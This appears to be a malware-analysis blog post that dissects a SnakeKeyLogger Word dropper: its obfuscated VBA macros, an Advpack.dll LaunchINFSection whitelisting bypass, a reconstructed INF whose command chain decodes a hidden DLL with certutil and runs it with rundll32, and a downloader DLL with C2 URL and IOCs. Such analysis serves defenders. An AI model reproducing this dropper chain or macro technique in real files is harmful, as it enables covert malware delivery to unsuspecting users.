Dissecting SnakeKeyLogger Macros

7 minute read

Introduction

this blog will discuss how SnakeKeyLogger uses Advpack.dll to drop and execute his main payload.

Snake Keylogger slithers past traditional defenses using social engineering and technical trickery. This post delves into the specifics of its phishing email tactics and malicious macro exploitation, providing valuable insights for security professionals and tech-savvy users to bolster their defenses against this evolving threat.

About The specimen

the sample we have today is a doc file.

hash: 8af7f091c0c869006be53ef947b10ee18ddf6a2c2870a9b163484a372f94b90a

VBA Existence

the first check we need to observe when it comes to office files is the existence of Macros which are used by the TA to execute VBA commands and act as a dropping or downloading phase, using Oleid to check macros we got a result that this file contains a macros.

macros are being analyzed in many ways but I prefer to use Office VBA IDE which has many capabilities such as viewing all objects and debugging the code itself which help us more than manual deobfuscation.

Doc File Analysis

the file has only one page that contains an image which informs the user that there is an issue with loading the original page and asks him to enable macros and also to check the disk space to be able to view the decoy page which does not exist by the way and there are no macros that view any other pages or whatever.

Macros Analysis

it first checks the version of VBA and based on it will check the system of the victim if it’s x86 or x64 it will declare a specific function, overall it will declare a function called tAcKs() and this function is defined as LunachINFSectionW from Advpack.dll and according to MSDN this function is used to launch a portion of Information file

and here is the declaration of LaunchINFSection

int WINAPI LaunchINFSection(  
   HWND      hwndOwner,  
   HINSTANCE hInstance,  
   PSTR      pszParams,  
   INT       nShow  
);

and Snake uses this method to run the Inf file under a legitimate container or process, according to lolbas-project it uses this technique to bypass AWL which refers to Application WhiteListing ‘Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).’

AutoOpen() function

there is only one call inside the AutoOpen() function which is the first call executed when the macros are enabled you can call it the entry point or the main of doc macros, it calls a function called PsfmA(), this function only contains another two calls WHTLE() and tAcKs(), remember that tAcks is the pointer to LaunchINFSectionW API call from ADVpacK.dll

if u notice that there is an argument FlkMT passed to the WHTLE() function I will explain it another time, just let’s explore WHTLE() function.

WHTLE() Function

this function takes 2 arguments and from the first look, this function handles file writing operations which may contain the payload or any other command to be executed if u take a look back at the psfma() function you can see that the tAcKs() function takes the same file passed to WHTLE as argument.

Static Function WHTLE(iMwDk, dOPaA):  
  
Dim wmEjI, xgxIS: wmEjI = FreeFile:  
Open iMwDk For Binary Access Read Write As #wmEjI:  
    For xgxIS = LBound(dOPaA) To UBound(dOPaA):  
        Put #wmEjI, , CByte(dOPaA(xgxIS)):  
        Next:  
Close #wmEjI:  
End Function

if you see it opens a handle to the iMwDk which the file path passed to WHTLE function and then uses the size of dOPaA as the last index for writing operation specified by Put Keyword and it uses CByte() to convert an expression into a byte data type.

so now we need to check what is dOPaA argument, as we saw before……… it is referred to as FLKMT and this argument is a function call, so FLKMT is responsible for building the payload which will be written in TEMP Directory using WHTLE function.

FlkMT() function → Payload builder

inside this function, it assigns the value of FlkMTT with jAplA which is a function call that returns an array of decimal values, and after assigning it will execute many calls to a function called rFdPB() which takes two arguments and the first argument is FlKMT and the second argument is varied for every call, and the second argument is a function which retrieves a punch of bytes as same as jAplA.

and here is the implementation of rFdPB() which called many many times and it is

This VBA macro defines a function named “rFdPB” that concatenates two arrays, “dkbDR” and “quELr,” and stores the result in “dkbDR.” It uses static variables “ioQHr” and “QDLuE” to keep track of array indices and their sizes. The function first determines the size of “dkbDR” and then resizes it to accommodate the combined size of both arrays. Finally, it loops through each element of “quELr” and appends it to “dkbDR” The “Next: End Function” at the end seems to be a mistake as it would create a syntax error; it should be removed.

and here is the deobfuscated version of this function if u found it hard to understand it.

Function Copy_to_1st_array(ByRef payload As Variant, ByRef array_to_copy As Variant):  
  
Static indexAs Long:  
Static payload_lengthAs Long:  
payload_length= UBound(payload) + 1:                        
ReDim Preserve payload(payload_length+ UBound(array_to_copy)):      
For index= LBound(array_to_copy) To UBound(array_to_copy):       
    payload(payload_length + index) = array_to_copy(index):          
Next:  
End Function

so in brief this function appends and builds the payload of INF file.

Executed Command line

I have tried to build the first 5 calls and I got a significant result

[VErsiON]  
  
  
 SIgNAtuRe = $Chicago$  
  
  
 aDVANcEDInf = 2.5  
  
  
 [deFAULTInSTALL_sInGLEUSeR]  
  
  
  
 rUnPostSETUPcommAnDS = werd  
  
  
  
 [werd]  
  
  
 %11%\cMd.exe /C morE /E +29 %TEmP%\VN.inf > %TEmP%\cvr.tmp  
 && CERTUtIL -DEcoDEHex %TEmP%\cvr.tmp %TEmP%\xhd.jpg  
 && ruNDLl32 %TEmP%\xhd.jpg,main && del %TEmP%\cvr.tmp  
 && dEL %TEmP%\xhd.jpg && del %TEmP%\VN.inf  
  
  
  
 [Strings]  
  
  
 servICEName = ">"  
  
 SHoRtsvCnaME = "<"  
  
  
4D5A> 

many flags have been triggered right now the full command line seems to be malicious and the existence of 4D5A which refers to MZ signature and the existence of a PE payload, so I put a breakpoint on the call to tAcKs function which is declaretion to LaunchINFSectionW.

so what is meant by INF files ?!

INF file :

An INF file, short for information file, is a plain text file used by Microsoft Windows operating systems for the installation of software and drivers. They are essential components in the Windows Setup API, providing the instructions and information needed to properly install and configure devices and software.

so let’s check the INF file dropped in the Temp Directory and try to simulate the command found above to know what is going on.

so let’s breakdown the executed command

%11%\cMd.exe /C morE /E +29 %TEmP%\VN.inf > %TEmP%\cvr.tmp  
 && CERTUtIL -DEcoDEHex %TEmP%\cvr.tmp %TEmP%\xhd.jpg  
 && ruNDLl32 %TEmP%\xhd.jpg,main && del %TEmP%\cvr.tmp  
 && dEL %TEmP%\xhd.jpg && del %TEmP%\VN.inf

%11%cmd.exe

%11% referee to system32 path to run cmd.exe with admin permission

morE /E +29 %TEmP%\VN.inf > %TEmP%\cvr.tmp

this command saves the content of VN.inf starting from the end of line 29 till the end of VN.inf file to cvr.tmp file

CERTUtIL -DEcoDEHex %TEmP%\cvr.tmp %TEmP%\xhd.jpg

this command uses the feature of hex decoding in certutil which is a command-line program that is installed as part of Certificate Services, and saves the result to xhd.jpg file which will contain the main payload

ruNDLl32 %TEmP%\xhd.jpg,main

here the TA uses Rundll32 which is used to run a DLL and execute xhd.jpg and the export function here is main which will be executed by rundll32 command

del %TEmP%\cvr.tmp && dEL %TEmP%\xhd.jpg && del %TEmP%\VN.inf

then it will erase his row existence as the process has been executed and delete the 3 dropped files (VN.inf , cvr.tmp, and xhd.jpg).

Main payload analysis

the dropped file is a 32-bit Dll, and exploring its string I found some interesting ones, that clarify this payload as a Downloader.

so we need to locate the C2 which will be used to download the next stage

dropped File Analysis

the dropped file is a 32-bit Dll and it has some misleading techniques like embedding the strings within the text section that make disassembling hard and require some manual work to fix offsets and code lines

as I have said before the most important thing in this phase is to identify the C2 and here we are.

and here is the request and the CnC ** vybsnf3p.sa.com /fdsfh.exe**

unfortunately, I found that the C2 is down and the dropped file is the server response for Error 404 but whatever the dropped file it will pass it to WinExec API call.

and tracing the domain in some public repos I found that this domain belongs to SnakeKeylogger Stealer and it has many other files like med.bat script, but currently as i have said before the C2 is down

and here is the downloaded reposonse which if the C2 was up it will be the next stage payload

IOCs

File IOCs:  
doc file         : 
8af7f091c0c869006be53ef947b10ee18ddf6a2c2870a9b163484a372f94b90a
     
 
dropped INF file : 
EE497723EA8F25B3732829DB0AA09F0502607505E816E8D9997F070C4222C98C 
 
dropped DLL      : 
B1305F33FD9B834FE7A926F1253BB1E97FF4DDD669C8051FEBA989F819CD667A  

Dropping path : %TEMP%
weidr.com
  
C2:  
 
vybsnf3.sa.com
/fdsfh.exe

Updated: